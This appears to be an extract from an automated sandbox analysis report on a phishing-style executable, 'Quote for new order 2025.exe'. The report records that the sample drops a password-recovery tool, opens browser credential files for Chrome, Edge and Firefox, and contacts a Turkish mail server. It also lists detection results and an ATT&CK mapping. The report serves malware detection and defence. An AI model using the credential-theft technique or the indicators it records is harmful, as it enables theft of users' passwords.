                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Users\user\Desktop\Quote for new order 2025.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Users\user\Desktop\Quote for new order 2025.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: 4_2_0041A773 GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,4_2_0041A773
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: 4_2_004192F2 GetVersionExW,4_2_004192F2
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                          Stealing of Sensitive Information

                          barindex
                          Tries to harvest and steal browser information (history, passwords, etc)
                          Source: C:\Users\user\Desktop\Chrom.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                          Source: C:\Users\user\Desktop\Chrom.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Users\user\Desktop\Chrom.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Users\user\Desktop\Chrom.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                          Source: C:\Users\user\Desktop\Chrom.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                          Source: C:\Users\user\Desktop\Chrom.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                          Yara detected WebBrowserPassView password recovery tool
                          Source: Yara matchFile source: Quote for new order 2025.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.Quote for new order 2025.exe.eaa5ec.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 14.2.Chrom.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 4.0.Chrom.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.Quote for new order 2025.exe.eaa5ec.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.0.Chrom.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.Chrom.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 14.0.Chrom.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 4.2.Chrom.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.Quote for new order 2025.exe.e90000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000004.00000000.1676249370.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000008.00000002.1819130753.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000008.00000000.1800979457.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000E.00000000.1883289782.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000000.1658990510.0000000000E92000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000E.00000002.1901575324.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Quote for new order 2025.exe PID: 7396, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: Chrom.exe PID: 7612, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: Chrom.exe PID: 7948, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: Chrom.exe PID: 1816, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\Desktop\Chrom.exe, type: DROPPED

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity Information1
                          Scripting                          		Valid Accounts1
                          Native API                          		1
                          Scripting                          		1
                          DLL Side-Loading                          		1
                          Disable or Modify Tools                          		1
                          OS Credential Dumping                          		1
                          System Time Discovery                          		Remote Services1
                          Archive Collected Data                          		2
                          Encrypted Channel                          		Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault AccountsScheduled Task/Job1
                          DLL Side-Loading                          		11
                          Process Injection                          		1
                          Deobfuscate/Decode Files or Information                          		1
                          Input Capture                          		2
                          File and Directory Discovery                          		Remote Desktop Protocol1
                          Data from Local System                          		1
                          Non-Standard Port                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain AccountsAt1
                          Registry Run Keys / Startup Folder                          		1
                          Registry Run Keys / Startup Folder                          		4
                          Obfuscated Files or Information                          		Security Account Manager17
                          System Information Discovery                          		SMB/Windows Admin Shares1
                          Input Capture                          		1
                          Non-Application Layer Protocol                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                          Software Packing                          		NTDS111
                          Security Software Discovery                          		Distributed Component Object Model2
                          Clipboard Data                          		11
                          Application Layer Protocol                          		Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                          Timestomp                          		LSA Secrets31
                          Virtualization/Sandbox Evasion                          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                          DLL Side-Loading                          		Cached Domain Credentials3
                          Process Discovery                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                          Masquerading                          		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                          Virtualization/Sandbox Evasion                          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                          Process Injection                          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1586086 Sample: Quote for new order 2025.exe Startdate: 08/01/2025 Architecture: WINDOWS Score: 84 37 mail.lmd.com.tr 2->37 41 Antivirus / Scanner detection for submitted sample 2->41 43 Multi AV Scanner detection for submitted file 2->43 45 Machine Learning detection for sample 2->45 47 3 other signatures 2->47 8 Quote for new order 2025.exe 1 6 2->8         started        12 Quote for new order 2025.exe 4 2->12         started        14 Quote for new order 2025.exe 4 2->14         started        signatures3 process4 dnsIp5 39 mail.lmd.com.tr 77.245.158.126, 49733, 49736, 49743 NIOBEBILISIMHIZMETLERITR Turkey 8->39 35 C:\Users\user\Desktop\Chrom.exe, PE32 8->35 dropped 16 cmd.exe 1 8->16         started        18 cmd.exe 12->18         started        20 cmd.exe 14->20         started        file6 process7 process8 22 Chrom.exe 14 16->22         started        25 conhost.exe 16->25         started        27 Chrom.exe 18->27         started        29 conhost.exe 18->29         started        31 Chrom.exe 1 20->31         started        33 conhost.exe 20->33         started        signatures9 49 Multi AV Scanner detection for dropped file 22->49 51 Tries to harvest and steal browser information (history, passwords, etc) 27->51

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          Quote for new order 2025.exe61%ReversingLabsWin32.PUA.PassShow
                          Quote for new order 2025.exe100%AviraTR/Spy.Gen
                          Quote for new order 2025.exe100%Joe Sandbox ML

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\Users\user\Desktop\Chrom.exe81%ReversingLabsWin32.PUA.PassView

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          No Antivirus matches

                          URLs

                          SourceDetectionScannerLabelLink
                          http://www.sakkal.comH40%Avira URL Cloudsafe
                          https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad70%Avira URL Cloudsafe
                          https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e7420%Avira URL Cloudsafe
                          https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d7888073423260%Avira URL Cloudsafe
                          https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d0%Avira URL Cloudsafe
                          https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc0%Avira URL Cloudsafe
                          https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf680%Avira URL Cloudsafe
                          https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa4370%Avira URL Cloudsafe
                          https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b030%Avira URL Cloudsafe
                          https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d0%Avira URL Cloudsafe
                          https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d50%Avira URL Cloudsafe

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          mail.lmd.com.tr
                          		77.245.158.126
                          		truefalse
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://www.fontbureau.com/designersGQuote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.fontbureau.com/designers/?Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.founder.com.cn/cn/bTheQuote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=Wbhv428D.tmp.14.drfalse
                                    		high
                                    https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbadbhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                      		high
                                      http://www.fontbureau.com/designers?Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://aefd.nelreports.net/api/report?cat=bingthbhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                          		high
                                          https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fccbhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.tiro.comQuote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.fontbureau.com/designersQuote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.nirsoft.netChrom.exe, 00000004.00000002.1693705327.0000000000193000.00000004.00000010.00020000.00000000.sdmp, Chrom.exe, 00000008.00000002.1818996004.0000000000193000.00000004.00000010.00020000.00000000.sdmp, Chrom.exe, 0000000E.00000002.1901410541.0000000000193000.00000004.00000010.00020000.00000000.sdmpfalse
                                                		high
                                                https://aefd.nelreports.net/api/report?cat=bingaotakbhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                  		high
                                                  https://deff.nelreports.net/api/report?cat=msnbhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                    		high
                                                    https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Frbhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                      		high
                                                      http://www.goodfont.co.krQuote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Frbhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                          		high
                                                          https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                            		high
                                                            http://www.sajatypeworks.comQuote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.typography.netDQuote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.founder.com.cn/cn/cTheQuote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950cbhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                                    		high
                                                                    http://www.galapagosdesign.com/staff/dennis.htmQuote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://maps.windows.com/windows-app-web-linkbhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                                        		high
                                                                        https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&platbhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                                          		high
                                                                          http://www.galapagosdesign.com/DPleaseQuote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                                              		high
                                                                              https://login.yahoo.com/config/loginChrom.exefalse
                                                                                		high
                                                                                http://www.fonts.comQuote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.sandoll.co.krQuote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.urwpp.deDPleaseQuote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.nirsoft.net/Quote for new order 2025.exe, Chrom.exe.0.drfalse
                                                                                        		high
                                                                                        http://www.zhongyicts.com.cnQuote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameQuote for new order 2025.exe, 00000000.00000002.3530691403.0000000003451000.00000004.00000800.00020000.00000000.sdmp, Quote for new order 2025.exe, 00000005.00000002.3530288167.0000000002561000.00000004.00000800.00020000.00000000.sdmp, Quote for new order 2025.exe, 0000000B.00000002.3529863966.0000000002AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.sakkal.comQuote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816dbhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                                                                		high
                                                                                                https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367dbhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgbhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                                                                  		high
                                                                                                  https://www.office.com/bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                                                                    		high
                                                                                                    http://www.apache.org/licenses/LICENSE-2.0Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.fontbureau.comQuote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                                                                          		high
                                                                                                          https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                                                                            		high
                                                                                                            https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8dbhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://aefd.nelreports.net/api/report?cat=wsbbhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                                                                              		high
                                                                                                              https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              http://www.sakkal.comH4Quote for new order 2025.exe, 00000000.00000002.3539348359.0000000005D84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              http://www.carterandcone.comlQuote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.fontbureau.com/designers/cabarga.htmlNQuote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://www.founder.com.cn/cnQuote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://www.fontbureau.com/designers/frere-user.htmlQuote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://aefd.nelreports.net/api/report?cat=bingaotbhv428D.tmp.14.drfalse
                                                                                                                        		high
                                                                                                                        https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-aebhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                                                                                          		high
                                                                                                                          https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          http://www.jiyu-kobo.co.jp/Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://www.fontbureau.com/designers8Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFDbhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                                                                                                		high
                                                                                                                                https://aefd.nelreports.net/api/report?cat=bingrmsbhv428D.tmp.14.drfalse
                                                                                                                                  		high
                                                                                                                                  https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                                                                                                    		high
                                                                                                                                    https://www.google.com/accounts/serviceloginChrom.exefalse
                                                                                                                                      		high
                                                                                                                                      https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		unknown
                                                                                                                                      https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                                                                                                        		high
                                                                                                                                        https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                                                                                                          		high
                                                                                                                                          https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                                                                                                            		high

                                                                                                                                            World Map of Contacted IPs

                                                                                                                                            • No. of IPs < 25%
                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                            • 75% < No. of IPs

                                                                                                                                            Public IPs

                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                            77.245.158.126
                                                                                                                                            		mail.lmd.com.trTurkey
                                                                                                                                            		42868NIOBEBILISIMHIZMETLERITRfalse

                                                                                                                                            General Information

                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                            Analysis ID:1586086
                                                                                                                                            Start date and time:2025-01-08 17:55:56 +01:00
                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                            Overall analysis duration:0h 7m 42s
                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                            Report type:full
                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                            Run name:Run with higher sleep bypass
                                                                                                                                            Number of analysed new started processes analysed:19
                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                            Technologies:
                                                                                                                                            • HCA enabled
                                                                                                                                            • EGA enabled
                                                                                                                                            • AMSI enabled
                                                                                                                                            Analysis Mode:default
                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                            Sample name:Quote for new order 2025.exe
                                                                                                                                            Detection:MAL
                                                                                                                                            Classification:mal84.troj.spyw.winEXE@21/9@1/1
                                                                                                                                            EGA Information:
                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                            HCA Information:
                                                                                                                                            • Successful, ratio: 98%
                                                                                                                                            • Number of executed functions: 188
                                                                                                                                            • Number of non-executed functions: 167
